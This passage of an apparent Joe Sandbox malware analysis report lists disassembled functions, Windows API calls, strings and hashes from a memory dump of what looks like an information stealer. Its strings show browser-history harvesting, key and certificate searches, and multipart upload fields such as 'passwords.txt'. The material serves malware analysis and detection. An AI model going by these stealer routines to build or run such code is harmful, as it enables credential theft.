                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000028,00000000), ref: 012F22B3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F22CC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012F22DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000000), ref: 012F22EE
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,00000000,?,00000000), ref: 012F22FD
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00660046), ref: 012F2308
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00660046), ref: 012F230F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F2323
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F2335
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000,?,?,00660046,?,?,00660046), ref: 012F2340
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 012F234C
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 012F2358
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$GlobalLockSecurityUnlock$CreateDescriptorHandleObjectPointerTokenWrite$CloseCompatibleCurrentFreeOpenProcessReleaseThread$AdjustAllocBitmapBitsConvertCursorDeleteErrorInfoInformationLastLocalLookupNamedPrivilegePrivilegesSaclSelectStringValue
                                                                                                                                                                                                              • String ID: ($6$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 532523266-808120212
                                                                                                                                                                                                              • Opcode ID: 50bfdf1d631c2f10a9a2a934403e7b0ed877aa73e3f195d8a55e104b7b93a828
                                                                                                                                                                                                              • Instruction ID: 6cd690d09369470ba37b3314315563c38c41af9672653947583f48cdc06929b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50bfdf1d631c2f10a9a2a934403e7b0ed877aa73e3f195d8a55e104b7b93a828
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20914CB2105301AFE320AF64DC88EABBBECFF89755F00491DF68596284D774DA05CB62
                                                                                                                                                                                                              Function 012FF9C0 Relevance: 65.0, APIs: 31, Strings: 6, Instructions: 256memorysynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c125), ref: 012FF9E8
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133DDC8,00000000), ref: 012FFA29
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FFA2F
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FFA37
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133DDC8), ref: 012FFA46
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FFA4D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(0133DDC8,00000000), ref: 012FFA89
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(0133DDC8), ref: 012FFA94
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c125,?,?), ref: 012FFAD6
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D998,00000000), ref: 012FFB11
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FFB17
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FFB1F
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D998), ref: 012FFB2E
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FFB35
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D998,00000000), ref: 012FFB63
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FFB69
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FFB71
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D998), ref: 012FFB80
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FFB87
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FFB91
                                                                                                                                                                                                              • memset.MSVCRT(0133DDC8,00000000,00000104), ref: 012FFBC7
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FFC41
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 012FFC52
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 012FFC6F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FFC76
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FFC88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FFC98
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FFCAA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012FFCAD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FFCBA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012FFCBD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$CreateFileHeap$#680DirectoryFolderMakeSystem$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: 61c5c125$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$\*.bk$keys\$path.txt
                                                                                                                                                                                                              • API String ID: 30728639-3232212359
                                                                                                                                                                                                              • Opcode ID: cc911e23bb209fd92cc3c21496a5ef771aef3e773e0aa92a71c8e3368b58efd9
                                                                                                                                                                                                              • Instruction ID: 6695c9bb56188a6c8a8c1c0e252de413782a2d18d6a540a934ab30318b984102
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc911e23bb209fd92cc3c21496a5ef771aef3e773e0aa92a71c8e3368b58efd9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF91F4315007469FDB32AF789928BAABFE8FF4A705F54805CEA85D7341EB708904CB94
                                                                                                                                                                                                              Function 012F3BA4 Relevance: 63.5, APIs: 27, Strings: 9, Instructions: 477filememorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012F3BCA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012F3C72
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012F3C7F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 012F3C85
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s%u.zip,01339D68,00000000), ref: 012F3CA2
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 012F3CB9
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 012F3CD6
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?), ref: 012F3D05
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileVirtual$AllocAttributesBackslashCountDeleteFreePathTick_snprintflstrcpyn
                                                                                                                                                                                                              • String ID: -----------------------------$%s%u.zip$--$-----------------------------$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt
                                                                                                                                                                                                              • API String ID: 3203035732-4064006501
                                                                                                                                                                                                              • Opcode ID: ed71f928831ee165c685d1c674c4030538acc1a63500d05c27acf52ad4c3760c
                                                                                                                                                                                                              • Instruction ID: d9f0725abed039b57ad64bd1628e77b09bd5e05f4f9c9cf6ed429ad77d7c3bbc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed71f928831ee165c685d1c674c4030538acc1a63500d05c27acf52ad4c3760c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF1393151425B4BDB26DF288864BFBFBA6BF45304F0441ACEF869B245DA72DA09C790
                                                                                                                                                                                                              Function 012E5D30 Relevance: 63.3, APIs: 29, Strings: 7, Instructions: 335memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,00000001,012E405C,775B5CE0), ref: 012E5D61
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012E5D9D
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012E5DAA
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 012E5DC9
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000022,00000000,00000000,?,?,00000001), ref: 012E5DF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 012E5E80
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E5E83
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E5E90
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E5E93
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012E5EA8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 012E5F2A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E5F31
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E5F3E
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E5F45
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012E5F5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 012E5FE0
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E5FE3
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E5FF0
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E5FF3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E6042
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,012F3AB4,00000000), ref: 012E6051
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,012F3A9B,012F3AB4,00000000,00000000), ref: 012E6066
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileProcess$Path$FolderFreeValidate$AttributesBackslashCreateDeleteLockPointerWrite
                                                                                                                                                                                                              • String ID: \History.IE5\index.dat$\Opera\Opera\global_history.dat$\Opera\Opera\typed_history.xml$http$http$http$links.log
                                                                                                                                                                                                              • API String ID: 439524787-762728116
                                                                                                                                                                                                              • Opcode ID: ed7c54b8f2702b1e4fb7e54e248eeef684778d6ad57de34ffe7c74158c02c4e0
                                                                                                                                                                                                              • Instruction ID: 094e6629525b1a2cf800737e5135d5c00633448077c56ef03faf415e4f1b4350
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed7c54b8f2702b1e4fb7e54e248eeef684778d6ad57de34ffe7c74158c02c4e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EB1E235910316ABEB30DE64DC4DFEABBBDEB45714F948048F705AB185DB70AA41CBA0
                                                                                                                                                                                                              Function 012E80C0 Relevance: 63.2, APIs: 32, Strings: 4, Instructions: 182memorysleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012E7C80: #680.SHELL32 ref: 012E7C8A
                                                                                                                                                                                                                • Part of subcall function 012E7C80: memset.MSVCRT(?,00000000,00000103), ref: 012E7CC1
                                                                                                                                                                                                                • Part of subcall function 012E7C80: memset.MSVCRT(?,00000000,000000FF,?,00000000,00000103), ref: 012E7CD9
                                                                                                                                                                                                                • Part of subcall function 012E7C80: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 012E7CFB
                                                                                                                                                                                                                • Part of subcall function 012E7C80: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104), ref: 012E7D21
                                                                                                                                                                                                                • Part of subcall function 012E7C80: GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 012E7DAD
                                                                                                                                                                                                                • Part of subcall function 012E7C80: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 012E7DB4
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 012E8105
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012E8112
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 012E8124
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012E812D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012E8145
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012E8157
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8162
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E8165
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8172
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E8175
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8182
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E8185
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8192
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E8195
                                                                                                                                                                                                              • SetCaretBlinkTime.USER32(000000FF), ref: 012E81A7
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 012E81D5
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000), ref: 012E8205
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8215
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E8218
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8225
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E8228
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8235
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E8238
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8245
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E8248
                                                                                                                                                                                                              • Sleep.KERNEL32(00001388), ref: 012E8253
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 012E8285
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 012E82A5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 012E82BD
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012E82CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 012E82F2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012E830C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$#680AllocBlinkCaretQueryTimeValueclosesocket
                                                                                                                                                                                                              • String ID: 9E2B3C3Ba$9e2b3cbaa$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$P0Mw
                                                                                                                                                                                                              • API String ID: 3496834494-455512128
                                                                                                                                                                                                              • Opcode ID: a869e722a12d0fe6be6340a4f6b53ee675898d51a15571f1273af895cc99074e
                                                                                                                                                                                                              • Instruction ID: 853df1643dfb4295d816ec5d9da13a6523e9dc172703949cffb745a6b1faa74d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a869e722a12d0fe6be6340a4f6b53ee675898d51a15571f1273af895cc99074e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC51BD31610312ABE631BF759C0DFAB3AACAF45B55F84451CFB489A1C4DBB4C9008BA5
                                                                                                                                                                                                              Function 012FC850 Relevance: 58.0, APIs: 25, Strings: 8, Instructions: 271fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012FC86F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FC8A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FC8E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FC8F1
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FC8F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FC90A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FC911
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,crypto), ref: 012FC923
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.cer), ref: 012FC936
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.pub), ref: 012FC947
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012FC992
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FC99F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPath$#680AttributesBackslashCreateDeleteDirectoryFolderMakeSystemmemset
                                                                                                                                                                                                              • String ID: 61C5C0CB$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Mw$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                              • API String ID: 1722025706-1585194670
                                                                                                                                                                                                              • Opcode ID: 4350f3a2a40957b48770b308066b1e9f527537237801f96fd806eae1d05e7746
                                                                                                                                                                                                              • Instruction ID: 0769deaa805662fc9806a37f77248ce52d2e6974b87db348a49f31577b217571
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4350f3a2a40957b48770b308066b1e9f527537237801f96fd806eae1d05e7746
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E910A3195021E9BDB36EF78D858FFABBA8AF45704F0441ACEB49D7245DB709908CB90
                                                                                                                                                                                                              Function 012FEB30 Relevance: 54.5, APIs: 26, Strings: 5, Instructions: 223memorysynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012FEB4E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c1a3), ref: 012FEB7A
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FEBBD
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FEBC3
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FEBCB
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FEBDC
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FEBE3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012FEC1B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FEC28
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c1a3,?,?), ref: 012FEC67
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 012FECA5
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FECAC
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FECB4
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 012FECC5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FECCC
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FED06
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 012FED31
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 012FED55
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000006), ref: 012FED72
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FED79
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FED8B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FED9C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FEDAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012FEDAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FEDBB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012FEDBE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorHeapLastPath$CreateDirectoryFile$#680AttributesBackslashFolderHandleMakeMutexProcessSystem$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: 61c5c1a3$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$P0Mw$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 3642362227-2512274121
                                                                                                                                                                                                              • Opcode ID: 31bb15a6458da3612637a728b2cb4fe12424886b91b3a1cb70064f3f5857cceb
                                                                                                                                                                                                              • Instruction ID: b2c7890ca12e4e7a247010d13af846c72b33eafb0c053536dece1fa84fd3a85b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31bb15a6458da3612637a728b2cb4fe12424886b91b3a1cb70064f3f5857cceb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A571E8305003569FDB32AF389858BEA7BACAF45701F16819CFB85D7295DA70D644CBA0
                                                                                                                                                                                                              Function 012F8350 Relevance: 49.4, APIs: 24, Strings: 4, Instructions: 391fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 012F84B2
                                                                                                                                                                                                              • malloc.MSVCRT(-00000004), ref: 012F8513
                                                                                                                                                                                                              • sprintf.MSVCRT(00000000,%s.dbf,00000000), ref: 012F8522
                                                                                                                                                                                                              • calloc.MSVCRT(00000001,0000003C), ref: 012F852C
                                                                                                                                                                                                              • fopen.MSVCRT(00000000,?), ref: 012F8539
                                                                                                                                                                                                              • sprintf.MSVCRT(00000000,%s.DBF,00000000), ref: 012F854F
                                                                                                                                                                                                              • fopen.MSVCRT(00000000,?), ref: 012F855A
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012F856C
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012F856F
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012F857B
                                                                                                                                                                                                              • malloc.MSVCRT(000001F4), ref: 012F85A1
                                                                                                                                                                                                              • fread.MSVCRT(00000000,00000020,00000001,772D7310), ref: 012F85AF
                                                                                                                                                                                                              • fclose.MSVCRT(772D7310), ref: 012F85BE
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012F85CB
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012F85CE
                                                                                                                                                                                                              • malloc.MSVCRT(?), ref: 012F8631
                                                                                                                                                                                                              • realloc.MSVCRT(00000000,?), ref: 012F863C
                                                                                                                                                                                                              • fseek.MSVCRT(00000000,00000020,00000000), ref: 012F8651
                                                                                                                                                                                                              • fread.MSVCRT(00000000,?,00000001,00000000), ref: 012F8661
                                                                                                                                                                                                              • fclose.MSVCRT(00000000), ref: 012F8672
                                                                                                                                                                                                              • malloc.MSVCRT(?), ref: 012F868E
                                                                                                                                                                                                              • malloc.MSVCRT(?), ref: 012F8697
                                                                                                                                                                                                              • malloc.MSVCRT(?), ref: 012F86A0
                                                                                                                                                                                                              • malloc.MSVCRT(?), ref: 012F86AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
